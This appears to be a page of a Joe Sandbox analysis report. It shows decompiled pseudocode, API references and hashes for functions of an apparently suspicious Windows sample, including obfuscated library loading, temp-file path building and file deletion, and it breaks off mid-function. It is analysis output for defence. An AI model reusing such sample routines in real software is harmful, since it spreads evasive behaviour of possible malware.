Associated: 00000006.00000002.1665390063.00412000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_810.jbxd

Similarity

API ID: Heap$CloseCreateEventFreeHandleProcess_snwprintf
String ID:
API String ID: 347592444-0
Opcode ID: f5f1df6a8d92be678a3ebd7c8c01a6fd352e51ef32d89a5d7b5f5c38237df9c9
Instruction ID: 96a375c12291d922c866fab161d7621f177b720687b1be02ba6b7f6adaed0451
Opcode Fuzzy Hash: f5f1df6a8d92be678a3ebd7c8c01a6fd352e51ef32d89a5d7b5f5c38237df9c9
Instruction Fuzzy Hash: A6F027B3A01214B7DB2017B1BC0DBDE7B68DB40712F0040F3FA0DF6292D97589048B99

Uniqueness

Uniqueness Score: 3.75%

Function 00406A8C, Relevance: 7.5, APIs: 6, Instructions: 14
memoryCOMMON

C-Code - Quality: 50%

			E00406A8C(intOrPtr* __ebx, void* __edi) {
				void* _t31;
				void* _t34;

				HeapFree(GetProcessHeap(), ??, ??);
				HeapFree(GetProcessHeap(), 0, _t31);
				HeapFree(GetProcessHeap(), 0,  *(_t34 - 8));
				HeapFree(GetProcessHeap(), ??, ??);
				HeapFree(GetProcessHeap(), ??, ??);
				if( *__ebx == 0) {
					 *(__edi + 0x1c) =  *(__edi + 0x1c) + 1;
					return 0 |  *__ebx != 0x00000000;
				} else {
					 *((intOrPtr*)(__edi + 0x20)) =  *((intOrPtr*)(__edi + 0x20)) + 1;
					 *(__edi + 0x1c) = 0;
					return 0 |  *__ebx != 0x00000000;
				}
			}

0x00406a93
0x00406aa3
0x00406ab5
0x00406ac7
0x00406ad9
0x00406ae2
0x00406afc
0x00406b0c
0x00406ae4
0x00406ae4
0x00406ae9
0x00406afb
0x00406afb

APIs

GetProcessHeap.KERNEL32 ref: 00406A8C
HeapFree.KERNEL32(00000000), ref: 00406A93
GetProcessHeap.KERNEL32(00000000), ref: 00406A9C
HeapFree.KERNEL32(00000000), ref: 00406AA3
GetProcessHeap.KERNEL32(00000000,?), ref: 00406AAE
HeapFree.KERNEL32(00000000), ref: 00406AB5

Memory Dump Source

Source File: 00000006.00000002.1665373163.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1665369399.00400000.00000004.sdmp Download File
Associated: 00000006.00000002.1665385810.00411000.00000002.sdmp Download File
Associated: 00000006.00000002.1665390063.00412000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_810.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 6f2fc90e78e1e51f882b952c80842e7832dbe1ae74d3a0acd6f71baed62ec3ee
Instruction ID: 0c924488a8a540a9df47b780c79b3ffcea97af6f0373fd88ea69389fcf36fc37
Opcode Fuzzy Hash: 6f2fc90e78e1e51f882b952c80842e7832dbe1ae74d3a0acd6f71baed62ec3ee
Instruction Fuzzy Hash: 37D0CE77948B10FBD7411BF0AD0DBDD3E38BB89703F4484A4F206C50A1CA7A45009F29

Uniqueness

Uniqueness Score: 0.01%

Function 00408311, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45
memorylibraryUNIQUE

C-Code - Quality: 70%

			E00408311(void* __esi, void* __eflags) {
				int _t31;
				void* _t33;
				void* _t36;
				void* _t37;
				void* _t39;
				void* _t40;
				void* _t41;

				 *((intOrPtr*)(_t41 - 0x6c)) = 0x57762683;
				 *((intOrPtr*)(_t41 - 0x68)) = 0x592baf94;
				 *((intOrPtr*)(_t41 - 0x64)) = 0xad8fd844;
				 *((intOrPtr*)(_t41 - 0x60)) = 0xba8e947f;
				 *((intOrPtr*)(_t41 - 0x5c)) = 0x75eb77e0;
				 *((intOrPtr*)(_t41 - 0x58)) = 0x6b9a4e89;
				 *((intOrPtr*)(_t41 - 0x54)) = 0x8f463d09;
				 *((intOrPtr*)(_t41 - 0x50)) = 0x445c08e3;
				 *((intOrPtr*)(_t41 - 0x4c)) = 0x9644cebc;
				 *((intOrPtr*)(_t41 - 0x48)) = 0x500c095b;
				 *((intOrPtr*)(_t41 - 0x44)) = 0x1dbceffb;
				 *((intOrPtr*)(_t41 - 0x40)) = 0x10966022;
				 *((intOrPtr*)(_t41 - 0x3c)) = 0xced97c24;
				 *((intOrPtr*)(_t41 - 0x38)) = 0xd2b6aaa3;
				 *((intOrPtr*)(_t41 - 0x34)) = 0xa7ede2e6;
				 *((intOrPtr*)(_t41 - 0x30)) = 0xbfd00c40;
				 *((intOrPtr*)(_t41 - 0x2c)) = 0x506bf409;
				 *((intOrPtr*)(_t41 - 0x28)) = 0x51769f7e;
				 *((intOrPtr*)(_t41 - 0x24)) = 0x4a3b59bb;
				 *((intOrPtr*)(_t41 - 0x20)) = 0x7e8ef40c;
				 *((intOrPtr*)(_t41 - 0x1c)) = 0xc05c293d;
				 *((intOrPtr*)(_t41 - 0x18)) = 0xfd52ddd5;
				 *((intOrPtr*)(_t41 - 0x14)) = 0xca5a685e;
				 *((intOrPtr*)(_t41 - 0x10)) = 0x490ba5f1;
				 *((intOrPtr*)(_t41 - 0xc)) = 0xc8f2a124;
				 *((intOrPtr*)(_t41 - 8)) = 0xf2d76c27;
				 *((intOrPtr*)(_t41 - 4)) = 0x12571069;
				_t39 = L00401D00(0x412cf0, _t36, _t37);
				 *0x417c7c = LoadLibraryW(_t39);
				_t31 = HeapFree(GetProcessHeap(), 0, _t39);
				_t35 =  *0x417c7c;
				_pop(_t40);
				if( *0x417c7c != 0) {
					goto 0x421714;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					return L00401480(_t33, _t35, _t36, _t37, _t40);
				} else {
					goto 0x421701;
					return _t31;
				}
			}

0x00408311
0x0040831d
0x00408324
0x0040832b
0x00408332
0x00408339
0x00408340
0x00408347
0x0040834e
0x00408355
0x0040835c
0x00408363
0x0040836a
0x00408371
0x00408378
0x0040837f
0x00408386
0x0040838d
0x00408394
0x0040839b
0x004083a2
0x004083a9
0x004083b0
0x004083b7
0x004083be
0x004083c5
0x004083cc
0x004083db
0x004083e7
0x004083f3
0x004083f9
0x004083ff
0x00408402
0x0040840a
0x0040840f
0x00408410
0x00408411
0x00408412
0x00408413
0x00408414
0x00408415
0x00408416
0x00408417
0x00408418
0x00408424
0x00408404
0x00408404
0x00408409
0x00408409

APIs

LoadLibraryW.KERNEL32(00000000), ref: 004083DE
GetProcessHeap.KERNEL32(00000000,00000000), ref: 004083EC
HeapFree.KERNEL32(00000000), ref: 004083F3

Strings

wu, xrefs: 00408332

Memory Dump Source

Source File: 00000006.00000002.1665373163.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1665369399.00400000.00000004.sdmp Download File
Associated: 00000006.00000002.1665385810.00411000.00000002.sdmp Download File
Associated: 00000006.00000002.1665390063.00412000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_810.jbxd

Similarity

API ID: Heap$FreeLibraryLoadProcess
String ID: wu
API String ID: 872250060-894654108
Opcode ID: 3d3a17bc0104033c69b6cb5043aec09d9bd33cde45084b886df5a336dfcd18a8
Instruction ID: 2c1c704b05edb18eda0c4e49e43d0b692caacde028797c83d3b9e25ac6e3d270
Opcode Fuzzy Hash: 3d3a17bc0104033c69b6cb5043aec09d9bd33cde45084b886df5a336dfcd18a8
Instruction Fuzzy Hash: 1E21DBB0C05399DBDF20DFD2A9442DDBEB4BB05700F208059E6122F215D7B94A02CF99

Uniqueness

Uniqueness Score: 100.00%

Function 0040FD10, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37memoryUNIQUE

APIs

_snwprintf.NTDLL ref: 0040FD36
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040FD42
HeapFree.KERNEL32(00000000), ref: 0040FD49

Strings

=A, xrefs: 0040FD12

Memory Dump Source

Source File: 00000006.00000002.1665373163.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1665369399.00400000.00000004.sdmp Download File
Associated: 00000006.00000002.1665385810.00411000.00000002.sdmp Download File
Associated: 00000006.00000002.1665390063.00412000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_810.jbxd

Similarity

API ID: Heap$FreeProcess_snwprintf
String ID: =A
API String ID: 1826127215-2889852490
Opcode ID: f100b8cbb66daa4c33dec416ce934670bd8f0da2d0b12a20d3e320f02545f3b2
Instruction ID: 1c1e68bb24a4aa57e2b3b2d102fc6a3430e57d5aa078b4f100b76e6ab119897b
Opcode Fuzzy Hash: f100b8cbb66daa4c33dec416ce934670bd8f0da2d0b12a20d3e320f02545f3b2
Instruction Fuzzy Hash: C8F09072500214BBC71157A8AC0CBEF776CEF89762F0181B6F909D2161DE7688508AAD

Uniqueness

Uniqueness Score: 100.00%

Function 0040FBF6, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27UNIQUE

APIs

GetTempPathW.KERNEL32 ref: 0040FBF6
GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 0040FC08
memset.NTDLL ref: 0040FC16

Strings

~A, xrefs: 0040FC2C

Memory Dump Source

Source File: 00000006.00000002.1665373163.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1665369399.00400000.00000004.sdmp Download File
Associated: 00000006.00000002.1665385810.00411000.00000002.sdmp Download File
Associated: 00000006.00000002.1665390063.00412000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_810.jbxd

Similarity

API ID: Temp$FileNamePathmemset
String ID: ~A
API String ID: 1684369170-1414967778
Opcode ID: 4808f1dce4225e0ff1649e2752ffc45264adee42787b8b21344f222753ffb751
Instruction ID: 880d7f7bb42418b45390f6052bdf98daea4e603c38e50fb7ac862f75840f5832
Opcode Fuzzy Hash: 4808f1dce4225e0ff1649e2752ffc45264adee42787b8b21344f222753ffb751
Instruction Fuzzy Hash: 5DF01770940219EADF20CBD0EC49BEE7BB8BB04345F504076E501E6290D778A6848B5A

Uniqueness

Uniqueness Score: 100.00%

Function 0040F69E, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20
memoryUNIQUE

C-Code - Quality: 50%

			E0040F69E(void* __esi) {
				void* _t2;
				void* _t8;
				void* _t10;

				 *0x415a94();
				_t2 = L00401D00(0x414660, 0x1cc, _t8);
				_t10 = _t2;
				 *0x4159dc(0x4181f0, 0x104, _t10, 0x4181f0, 0x417cd0, 0x67165621);
				return HeapFree(GetProcessHeap(), 0, _t10);
			}

0x0040f69e
0x0040f6b3
0x0040f6c2
0x0040f6cf
0x0040f6e9

APIs

_snwprintf.NTDLL ref: 0040F6CF
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040F6DB
HeapFree.KERNEL32(00000000), ref: 0040F6E2

Strings

`FA, xrefs: 0040F6AE

Memory Dump Source

Source File: 00000006.00000002.1665373163.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1665369399.00400000.00000004.sdmp Download File
Associated: 00000006.00000002.1665385810.00411000.00000002.sdmp Download File
Associated: 00000006.00000002.1665390063.00412000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_810.jbxd

Similarity

API ID: Heap$FreeProcess_snwprintf
String ID: `FA
API String ID: 1826127215-275680183
Opcode ID: 8e4a084d6b8bfef1fdcf8f33f02f8d77f32537508a67d380bb2625528da1ab5b
Instruction ID: 8d601c4d779ed0f8bfbc752ae231f4ea3c756d7450940e74a4bef5bf83632336
Opcode Fuzzy Hash: 8e4a084d6b8bfef1fdcf8f33f02f8d77f32537508a67d380bb2625528da1ab5b
Instruction Fuzzy Hash: 6FE01272685610F7D21027A4BC0EFDA3924EB85796F10C066F505591D2CAB9089186ED

Uniqueness

Uniqueness Score: 100.00%

Function 00401679, Relevance: 6.1, APIs: 4, Instructions: 77
memoryCOMMON

C-Code - Quality: 53%

			E00401679(intOrPtr __ecx, void** __edx) {
				signed int _t19;
				void _t24;
				long _t33;
				void* _t39;
				void** _t40;
				void _t42;
				long _t45;
				void* _t48;

				 *(_t48 - 0x10) = __edx;
				 *((intOrPtr*)(_t48 - 0xc)) = __ecx;
				 *(_t48 - 8) = 4;
				_t19 =  *0x41737c(__ecx, 0x20000005, _t48 - 4, _t48 - 8, 0);
				_t45 = 0;
				_t42 = 0;
				asm("sbb ebx, ebx");
				_t33 =  ~_t19 &  *(_t48 - 4);
				if(_t33 <= 0) {
					L10:
					return _t42;
				} else {
					_t39 = RtlAllocateHeap(GetProcessHeap(), 8, _t33);
					 *(_t48 - 4) = _t39;
					if(_t39 == 0) {
						goto L10;
					} else {
						 *(_t48 - 8) = 0;
						if(_t33 == 0) {
							L8:
							_t24 = HeapFree(GetProcessHeap(), 0, _t39);
							if(_t42 != 0) {
								goto L9;
							}
							goto L10;
						} else {
							while(1) {
								_t24 =  *0x4171a4( *((intOrPtr*)(_t48 - 0xc)), _t39 + _t45, _t33 - _t45, _t48 - 8);
								_t42 = _t24;
								if(_t42 == 0) {
									break;
								}
								_t39 =  *(_t48 - 8);
								if(_t39 == 0) {
									L9:
									goto 0x4202e4;
									asm("int3");
									 *_t39 = _t24;
									 *(_t39 + 4) = _t45;
									goto L10;
								} else {
									_t45 = _t39 + _t45;
									_t39 =  *(_t48 - 4);
									if(_t45 < _t33) {
										continue;
									} else {
										_t40 =  *(_t48 - 0x10);
										 *_t40 = _t39;
										_t40[1] = _t45;
										return _t42;
									}
								}
								goto L11;
							}
							_t39 =  *(_t48 - 4);
							goto L8;
						}
					}
				}
				L11:
			}

0x0040167b
0x00401683
0x0040168a
0x00401698
0x004016a0
0x004016a7
0x004016a9
0x004016ab
0x004016ae
0x00401735
0x0040173d
0x004016b4
0x004016c4
0x004016c6
0x004016cb
0x00000000
0x004016cd
0x004016cd
0x004016d2
0x00401716
0x00401720
0x00401728
0x00000000
0x00000000
0x00000000
0x004016d4
0x004016d4
0x004016e4
0x004016ea
0x004016ee
0x00000000
0x00000000
0x004016f0
0x004016f5
0x0040172a
0x0040172a
0x0040172f
0x00401730
0x00401732
0x00000000
0x004016f7
0x004016f7
0x004016f9
0x004016fe
0x00000000
0x00401700
0x00401702
0x00401705
0x0040170a
0x00401712
0x00401712
0x004016fe
0x00000000
0x004016f5
0x00401713
0x00000000
0x00401713
0x004016d2
0x004016cb
0x00000000

APIs

GetProcessHeap.KERNEL32(00000008,?,?,20000005,?,?,00000000), ref: 004016B7
RtlAllocateHeap.NTDLL(00000000,?,20000005), ref: 004016BE
GetProcessHeap.KERNEL32(00000000,00000000,?,20000005,?,?,00000000), ref: 00401719
HeapFree.KERNEL32(00000000,?,20000005), ref: 00401720

Memory Dump Source

Source File: 00000006.00000002.1665373163.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1665369399.00400000.00000004.sdmp Download File
Associated: 00000006.00000002.1665385810.00411000.00000002.sdmp Download File
Associated: 00000006.00000002.1665390063.00412000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_810.jbxd

Similarity

API ID: Heap$Process$AllocateFree
String ID:
API String ID: 576844849-0
Opcode ID: dc621bbc885b04103c0e743f98238ac17a2e97c6a50e31f13845838b672e3d77
Instruction ID: 7b6003bd19f7adc5baffd4223e1fbcff249d89d1aece7ec56a639f0ea1e801ef
Opcode Fuzzy Hash: dc621bbc885b04103c0e743f98238ac17a2e97c6a50e31f13845838b672e3d77
Instruction Fuzzy Hash: 1B213076B00209ABDB14CF99DC84BEEBBB9EB88311F1441BEE909E7390DB755D048B54

Uniqueness

Uniqueness Score: 0.01%

Function 0040233E, Relevance: 6.1, APIs: 4, Instructions: 59memoryCOMMON

APIs

RtlAllocateHeap.NTDLL ref: 00402347
memcpy.NTDLL(?,?), ref: 00402381
GetProcessHeap.KERNEL32(00000000), ref: 004023DF
HeapFree.KERNEL32(00000000), ref: 004023E6

Memory Dump Source

Source File: 00000006.00000002.1665373163.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1665369399.00400000.00000004.sdmp Download File
Associated: 00000006.00000002.1665385810.00411000.00000002.sdmp Download File
Associated: 00000006.00000002.1665390063.00412000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_810.jbxd

Similarity

API ID: Heap$AllocateFreeProcessmemcpy
String ID:
API String ID: 1161350397-0
Opcode ID: acf3bde76dd21ada73a75414b7a533fc1a006cd88b205a6f038bdfab5aadc4c8
Instruction ID: cbfdeecbb4913b5fe10fae720e1562f35dffb60ee5a4b57d66771b56068214b0
Opcode Fuzzy Hash: acf3bde76dd21ada73a75414b7a533fc1a006cd88b205a6f038bdfab5aadc4c8
Instruction Fuzzy Hash: 5D115B75A00205EFDB118FA4DD48BDEBBB8FF44341F104162F905E62A0D77999509F58

Uniqueness

Uniqueness Score: 0.09%

Function 0040CF86, Relevance: 6.0, APIs: 4, Instructions: 37synchronizationCOMMON

APIs

GetTickCount.KERNEL32 ref: 0040CF86
GetTickCount.KERNEL32(?,00000000), ref: 0040CF94
GetTickCount.KERNEL32(?,00000000), ref: 0040CFA5
WaitForSingleObject.KERNEL32(00000000), ref: 0040CFF1

Memory Dump Source

Source File: 00000006.00000002.1665373163.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1665369399.00400000.00000004.sdmp Download File
Associated: 00000006.00000002.1665385810.00411000.00000002.sdmp Download File
Associated: 00000006.00000002.1665390063.00412000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_810.jbxd

Similarity

API ID: CountTick$ObjectSingleWait
String ID:
API String ID: 2051767920-0
Opcode ID: f3d2764e70b1f14669f01fdac58a234177c26a55a76b523fb6b6616a96c8b16d
Instruction ID: 63b05cf7869a2088b4072e4800669228ad6823ebf1e602f7567a48c29eebbc32
Opcode Fuzzy Hash: f3d2764e70b1f14669f01fdac58a234177c26a55a76b523fb6b6616a96c8b16d
Instruction Fuzzy Hash: 56011971A00200DBE7105FA4EC4DBEE3B7AAB88706F52C036F206E61A1DB788446DB5C

Uniqueness

Uniqueness Score: 0.03%

Function 004067DC, Relevance: 6.0, APIs: 4, Instructions: 32
memoryCOMMON

C-Code - Quality: 76%

			E004067DC(intOrPtr __ecx, void* __edx, long* __edi) {
				void* _t4;
				void* _t9;
				void* _t17;
				void* _t19;

				_t9 = __edx;
				 *((intOrPtr*)(_t19 - 4)) = __ecx;
				_t4 = RtlAllocateHeap(GetProcessHeap(), 8,  *__edi);
				_t17 = _t4;
				if(_t17 == 0) {
					L4:
					goto 0x421546;
					asm("int3");
					return _t4;
				} else {
					_push(_t9);
					_push( *((intOrPtr*)(_t19 - 4)));
					if(L00402D50(_t17, __edi) == 0) {
						_t4 = _t17;
						goto L4;
					} else {
						HeapFree(GetProcessHeap(), 0, _t17);
						return 0;
					}
				}
			}

0x004067dc
0x004067de
0x004067ec
0x004067f2
0x004067f6
0x00406827
0x00406827
0x0040682c
0x0040682d
0x004067f8
0x004067f8
0x004067f9
0x0040680a
0x00406825
0x00000000
0x0040680c
0x00406816
0x00406824
0x00406824
0x0040680a

APIs

GetProcessHeap.KERNEL32(00000008), ref: 004067E5
RtlAllocateHeap.NTDLL(00000000), ref: 004067EC
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040680F
HeapFree.KERNEL32(00000000), ref: 00406816

Memory Dump Source

Source File: 00000006.00000002.1665373163.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1665369399.00400000.00000004.sdmp Download File
Associated: 00000006.00000002.1665385810.00411000.00000002.sdmp Download File
Associated: 00000006.00000002.1665390063.00412000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_810.jbxd

Similarity

API ID: Heap$Process$AllocateFree
String ID:
API String ID: 576844849-0
Opcode ID: 4b129fd1d3bfa55bcb54511794343a6e27424fe643a9be35616e1fabd111a783
Instruction ID: efd661d688544f1f25f4f358ecf4dda3a44b1f28c0b6ef5780b9edac874121ff
Opcode Fuzzy Hash: 4b129fd1d3bfa55bcb54511794343a6e27424fe643a9be35616e1fabd111a783
Instruction Fuzzy Hash: F3F0EC36B01611E7C70157E56C0C7AEBA64EF8C312F044076F909D2290EA758C1046D5

Uniqueness

Uniqueness Score: 0.01%

Function 0040687A, Relevance: 6.0, APIs: 4, Instructions: 29
memoryCOMMON

C-Code - Quality: 66%

			E0040687A(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t12;
				void* _t17;
				void* _t18;
				void* _t28;
				void* _t30;
				void* _t32;

				_t30 = __esi;
				_t18 = __ebx;
				_t28 = L00401D00(__ecx, __edx, __edi);
				_t12 =  *0x4159dc(_t18, _t30, _t28, GetTickCount() % 0xffff);
				HeapFree(GetProcessHeap(), 0, _t28);
				_push(_t18 + _t12 * 2);
				L00401850( *((intOrPtr*)( *((intOrPtr*)(_t32 - 4)))),  *((intOrPtr*)( *((intOrPtr*)(_t32 - 4)) + 4)));
				_t17 = _t18;
				goto 0x421578;
				return _t17;
			}

0x0040687a
0x0040687a
0x00406882
0x00406897
0x004068ac
0x004068b8
0x004068be
0x004068c6
0x004068c9
0x004068ce

APIs

GetTickCount.KERNEL32 ref: 00406884
_snwprintf.NTDLL ref: 00406897
GetProcessHeap.KERNEL32(00000000,00000000), ref: 004068A5
HeapFree.KERNEL32(00000000), ref: 004068AC

Memory Dump Source

Source File: 00000006.00000002.1665373163.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1665369399.00400000.00000004.sdmp Download File
Associated: 00000006.00000002.1665385810.00411000.00000002.sdmp Download File
Associated: 00000006.00000002.1665390063.00412000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_810.jbxd

Similarity

API ID: Heap$CountFreeProcessTick_snwprintf
String ID:
API String ID: 3064400467-0
Opcode ID: 61eb2e8a2a0bba321b9784d8fab72395e25da74deb52b4e7da625536a84e364d
Instruction ID: f7aa0fd5b044d3ed65273f8dd7d45fe96a0a471e0eb9a66c1f34fbbccabc190d
Opcode Fuzzy Hash: 61eb2e8a2a0bba321b9784d8fab72395e25da74deb52b4e7da625536a84e364d
Instruction Fuzzy Hash: 03F0A7B1A00540EBD7009761EC4D9AB3679EFC5345B14807DF40787292E9399D05C795

Uniqueness

Uniqueness Score: 4.01%

Function 0040F7FE, Relevance: 6.0, APIs: 4, Instructions: 29
memoryfileCOMMON

C-Code - Quality: 58%

			E0040F7FE(void* __esi) {
				void* _t7;
				void* _t17;
				void* _t19;
				void* _t21;

				 *0x415a94();
				_t19 = L00401D00(0x4140a0, 0xf0, _t17);
				_t7 = _t21 - 0x410;
				 *0x4159dc(_t21 - 0x208, 0x104, _t19, _t21 - 0x618, _t7, _t7, 0x67165621);
				HeapFree(GetProcessHeap(), 0, _t19);
				return DeleteFileW(_t21 - 0x208);
			}

0x0040f7fe
0x0040f818
0x0040f81a
0x0040f836
0x0040f849
0x0040f860

APIs

_snwprintf.NTDLL ref: 0040F836
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040F842
HeapFree.KERNEL32(00000000), ref: 0040F849
DeleteFileW.KERNEL32(?), ref: 0040F856

Memory Dump Source

Source File: 00000006.00000002.1665373163.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1665369399.00400000.00000004.sdmp Download File
Associated: 00000006.00000002.1665385810.00411000.00000002.sdmp Download File
Associated: 00000006.00000002.1665390063.00412000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_810.jbxd

Similarity

API ID: Heap$DeleteFileFreeProcess_snwprintf
String ID:
API String ID: 3158849725-0
Opcode ID: 1b97156d529e4b2d73c2e39d146e022efac8276400cb2f5503845371b8552a8b
Instruction ID: 5bc3b68f0fd21be6deacc6534247f069b318ca104038e9fecec902e9a2d11abe
Opcode Fuzzy Hash: 1b97156d529e4b2d73c2e39d146e022efac8276400cb2f5503845371b8552a8b
Instruction Fuzzy Hash: 0DF030B2940118EBD7109BA0EC4CFEB377CEB88355F0081F2FA09D6052DA755A948BA8

Uniqueness

Uniqueness Score: 0.09%

Function 0040F7C4, Relevance: 6.0, APIs: 4, Instructions: 24
memoryfileCOMMON

C-Code - Quality: 75%

			E0040F7C4(void* __esi) {
				void* _t12;
				void* _t13;
				void* _t14;
				void* _t16;
				void* _t18;

				_t16 = L00401D00(_t12, _t13, _t14);
				 *0x4159dc(_t18 - 0x208, 0x104, _t16, 0x4181f0, _t18 - 0x410);
				HeapFree(GetProcessHeap(), 0, _t16);
				return DeleteFileW(_t18 - 0x208);
			}

0x0040f7c9
0x0040f7e4
0x0040f849
0x0040f860

APIs

_snwprintf.NTDLL ref: 0040F7E4
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040F842
HeapFree.KERNEL32(00000000), ref: 0040F849
DeleteFileW.KERNEL32(?), ref: 0040F856

Memory Dump Source

Source File: 00000006.00000002.1665373163.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1665369399.00400000.00000004.sdmp Download File
Associated: 00000006.00000002.1665385810.00411000.00000002.sdmp Download File
Associated: 00000006.00000002.1665390063.00412000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_810.jbxd

Similarity

API ID: Heap$DeleteFileFreeProcess_snwprintf
String ID:
API String ID: 3158849725-0
Opcode ID: 0b908a810489e69cda7cc4604763f2507fc5495b5484b2c4b1d38218c77f97fa
Instruction ID: 6535a884d0e69d9550102bdc1fe6fb2051eabc1e3744ba9e6dc1a9061f5598af
Opcode Fuzzy Hash: 0b908a810489e69cda7cc4604763f2507fc5495b5484b2c4b1d38218c77f97fa
Instruction Fuzzy Hash: D8E048B3D40218FBC7109BA0AC0DFDA377CEB45315F0041F7F609E6051DA7555848B99

Uniqueness

Uniqueness Score: 0.09%

Function 0040FCAF, Relevance: 6.0, APIs: 4, Instructions: 23
memoryfileCOMMON

C-Code - Quality: 75%

			E0040FCAF(void* __edi, void* __esi) {
				void* _t11;
				void* _t12;
				void* _t16;
				void* _t18;

				_t16 = L00401D00(_t11, _t12, __edi);
				 *0x4159dc(_t18 - 0x430, 0x104, _t16, 0x417ee0);
				HeapFree(GetProcessHeap(), 0, _t16);
				DeleteFileW(_t18 - 0x430);
				return __edi;
			}

0x0040fcb4
0x0040fcc8
0x0040fcdb
0x0040fce8
0x0040fcf5

APIs

_snwprintf.NTDLL ref: 0040FCC8
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040FCD4
HeapFree.KERNEL32(00000000), ref: 0040FCDB
DeleteFileW.KERNEL32(?), ref: 0040FCE8

Memory Dump Source

Source File: 00000006.00000002.1665373163.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1665369399.00400000.00000004.sdmp Download File
Associated: 00000006.00000002.1665385810.00411000.00000002.sdmp Download File
Associated: 00000006.00000002.1665390063.00412000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_810.jbxd

Similarity

API ID: Heap$DeleteFileFreeProcess_snwprintf
String ID:
API String ID: 3158849725-0
Opcode ID: 9c6e6f149fc5f980d184f584a054acf8f10190f3752093c4bf256f81211141cc
Instruction ID: 40a60e715f607b6be21ee0a3fccc3a7574c87793bc8ca162da3a93eba4ce0b26
Opcode Fuzzy Hash: 9c6e6f149fc5f980d184f584a054acf8f10190f3752093c4bf256f81211141cc
Instruction Fuzzy Hash: 6FE086B2B50214F7C7106BA5AC0DBDF3B7CEB8436AF0441F7F609D6151D97545048BA8

Uniqueness

Uniqueness Score: 0.09%

Function 00405BD5, Relevance: 5.1, APIs: 4, Instructions: 82
COMMON

C-Code - Quality: 68%

			E00405BD5(void* __ebx, void __edi, signed int __esi) {
				signed int _t597;
				signed int _t599;
				void* _t600;
				signed int _t610;
				signed int* _t620;
				signed int _t623;
				signed int _t640;
				signed int _t642;
				signed int _t644;
				signed int _t652;
				signed int _t655;
				signed int _t657;
				signed int _t660;
				signed int _t666;
				signed int _t669;
				signed int _t671;
				void* _t673;
				signed int _t676;
				signed int _t680;
				signed int _t683;
				signed int _t684;
				signed int _t685;
				signed int _t690;
				unsigned int _t693;
				signed int _t694;
				signed int _t695;
				signed int _t699;
				signed int _t709;
				signed int _t714;
				signed int _t716;
				signed int _t719;
				signed int _t721;
				signed int _t722;
				intOrPtr _t734;
				intOrPtr _t735;
				intOrPtr _t736;
				signed int _t739;
				signed int _t743;
				void* _t749;
				signed int _t754;
				signed int _t756;
				signed int _t760;
				signed int _t764;
				signed int _t767;
				signed int _t771;
				void* _t776;
				signed int _t780;
				void* _t781;
				signed int _t786;
				void* _t787;
				void* _t788;
				signed int _t793;
				signed int _t794;
				void* _t796;
				signed int _t797;
				signed int _t804;
				signed int _t806;
				intOrPtr* _t808;
				void* _t809;
				signed int _t820;
				signed int _t822;
				intOrPtr _t824;
				signed char _t828;
				intOrPtr* _t830;
				void* _t831;
				signed int _t839;
				void* _t841;
				void* _t843;
				signed int _t845;
				intOrPtr _t846;
				signed int _t856;
				signed int _t859;
				void* _t860;
				void* _t861;
				void* _t862;
				void* _t863;
				void* _t864;
				void* _t865;
				void* _t866;
				void* _t867;
				signed char _t868;
				signed char _t871;
				intOrPtr _t873;
				signed int _t876;
				void* _t877;
				signed char _t879;
				signed int _t880;
				signed int _t881;
				signed char _t886;
				signed int _t888;
				void* _t889;
